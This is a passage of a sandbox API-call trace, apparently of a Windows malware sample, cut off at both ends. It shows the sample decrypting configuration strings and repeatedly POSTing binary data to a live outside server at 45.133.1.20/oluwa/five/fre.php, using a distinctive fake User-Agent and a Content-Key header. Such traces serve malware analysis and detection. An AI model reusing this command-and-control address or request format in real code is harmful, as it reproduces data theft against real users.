dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.004] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0186.013] GetProcessHeap () returned 0x6a0000 [0186.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0186.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.014] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0186.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.016] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.017] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.017] GetProcessHeap () returned 0x6a0000 [0186.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0186.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.019] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0186.020] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.020] CryptDestroyKey (hKey=0x6ad020) returned 1 [0186.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.021] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0186.021] GetProcessHeap () returned 0x6a0000 [0186.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0186.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.022] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0186.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.023] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0186.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.024] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0186.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.025] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0186.025] GetProcessHeap () returned 0x6a0000 [0186.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0186.026] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf9e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0186.027] GetProcessHeap () returned 0x6a0000 [0186.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0186.027] socket (af=2, type=1, protocol=6) returned 0x444 [0186.027] connect (s=0x444, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0186.049] FreeAddrInfoW (pAddrInfo=0x6bf9e0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0186.049] GetProcessHeap () returned 0x6a0000 [0186.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0186.049] GetProcessHeap () returned 0x6a0000 [0186.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0186.050] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0186.051] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.052] GetProcessHeap () returned 0x6a0000 [0186.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0186.052] GetProcessHeap () returned 0x6a0000 [0186.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0186.052] GetProcessHeap () returned 0x6a0000 [0186.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0186.052] GetProcessHeap () returned 0x6a0000 [0186.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0186.053] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0186.054] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.054] GetProcessHeap () returned 0x6a0000 [0186.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0186.055] GetProcessHeap () returned 0x6a0000 [0186.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0186.055] send (s=0x444, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0186.056] send (s=0x444, buf=0x6bb998*, len=159, flags=0) returned 159 [0186.056] GetProcessHeap () returned 0x6a0000 [0186.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0186.056] recv (in: s=0x444, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0186.168] GetProcessHeap () returned 0x6a0000 [0186.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0186.169] GetProcessHeap () returned 0x6a0000 [0186.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0186.169] GetProcessHeap () returned 0x6a0000 [0186.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0186.170] GetProcessHeap () returned 0x6a0000 [0186.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0186.170] closesocket (s=0x444) returned 0 [0186.171] GetProcessHeap () returned 0x6a0000 [0186.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0186.171] GetProcessHeap () returned 0x6a0000 [0186.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0186.172] GetProcessHeap () returned 0x6a0000 [0186.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0186.172] GetProcessHeap () returned 0x6a0000 [0186.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0186.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1158) returned 0x444 [0186.180] Sleep (dwMilliseconds=0xea60) [0186.182] GetProcessHeap () returned 0x6a0000 [0186.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0186.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.183] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0186.249] GetProcessHeap () returned 0x6a0000 [0186.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0186.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.251] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0186.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.252] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.254] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.254] GetProcessHeap () returned 0x6a0000 [0186.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0186.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.256] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0186.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.258] CryptDestroyKey (hKey=0x6ad020) returned 1 [0186.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.260] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0186.260] GetProcessHeap () returned 0x6a0000 [0186.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0186.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.262] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.263] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.265] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.269] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.269] GetProcessHeap () returned 0x6a0000 [0186.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0186.270] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.270] GetProcessHeap () returned 0x6a0000 [0186.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0186.271] GetProcessHeap () returned 0x6a0000 [0186.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0186.272] GetProcessHeap () returned 0x6a0000 [0186.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0186.272] GetProcessHeap () returned 0x6a0000 [0186.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0186.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0186.295] GetProcessHeap () returned 0x6a0000 [0186.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0186.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.296] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0186.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.297] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.298] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.298] GetProcessHeap () returned 0x6a0000 [0186.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0186.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.300] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0186.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.301] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0186.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.302] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0186.302] GetProcessHeap () returned 0x6a0000 [0186.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0186.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.303] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0186.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.304] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0186.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.305] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0186.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.306] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0186.306] GetProcessHeap () returned 0x6a0000 [0186.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0186.306] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfb48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0186.306] GetProcessHeap () returned 0x6a0000 [0186.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0186.306] socket (af=2, type=1, protocol=6) returned 0x448 [0186.307] connect (s=0x448, name=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0186.334] FreeAddrInfoW (pAddrInfo=0x6bfb48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0186.334] GetProcessHeap () returned 0x6a0000 [0186.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0186.334] GetProcessHeap () returned 0x6a0000 [0186.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0186.335] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0186.336] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0186.336] GetProcessHeap () returned 0x6a0000 [0186.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0186.336] GetProcessHeap () returned 0x6a0000 [0186.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0186.337] GetProcessHeap () returned 0x6a0000 [0186.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0186.337] GetProcessHeap () returned 0x6a0000 [0186.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0186.338] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0186.339] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0186.339] GetProcessHeap () returned 0x6a0000 [0186.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0186.339] GetProcessHeap () returned 0x6a0000 [0186.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0186.340] send (s=0x448, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0186.341] send (s=0x448, buf=0x6bb998*, len=159, flags=0) returned 159 [0186.341] GetProcessHeap () returned 0x6a0000 [0186.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0186.341] recv (in: s=0x448, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0186.415] GetProcessHeap () returned 0x6a0000 [0186.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0186.415] GetProcessHeap () returned 0x6a0000 [0186.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0186.417] GetProcessHeap () returned 0x6a0000 [0186.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0186.417] GetProcessHeap () returned 0x6a0000 [0186.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0186.417] closesocket (s=0x448) returned 0 [0186.418] GetProcessHeap () returned 0x6a0000 [0186.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0186.418] GetProcessHeap () returned 0x6a0000 [0186.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0186.419] GetProcessHeap () returned 0x6a0000 [0186.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0186.419] GetProcessHeap () returned 0x6a0000 [0186.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0186.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1174) returned 0x448 [0186.424] Sleep (dwMilliseconds=0xea60) [0186.426] GetProcessHeap () returned 0x6a0000 [0186.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0186.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.428] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.555] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0186.567] GetProcessHeap () returned 0x6a0000 [0186.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0186.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.568] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0186.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.570] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.571] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.572] GetProcessHeap () returned 0x6a0000 [0186.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0186.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.576] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0186.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.577] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0186.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.578] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0186.578] GetProcessHeap () returned 0x6a0000 [0186.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0186.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.580] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0186.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.581] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0186.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.583] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0186.584] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.584] GetProcessHeap () returned 0x6a0000 [0186.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0186.584] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.584] GetProcessHeap () returned 0x6a0000 [0186.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0186.585] GetProcessHeap () returned 0x6a0000 [0186.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0186.585] GetProcessHeap () returned 0x6a0000 [0186.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0186.586] GetProcessHeap () returned 0x6a0000 [0186.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0186.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.587] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0186.604] GetProcessHeap () returned 0x6a0000 [0186.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0186.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.605] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0186.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0186.608] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, 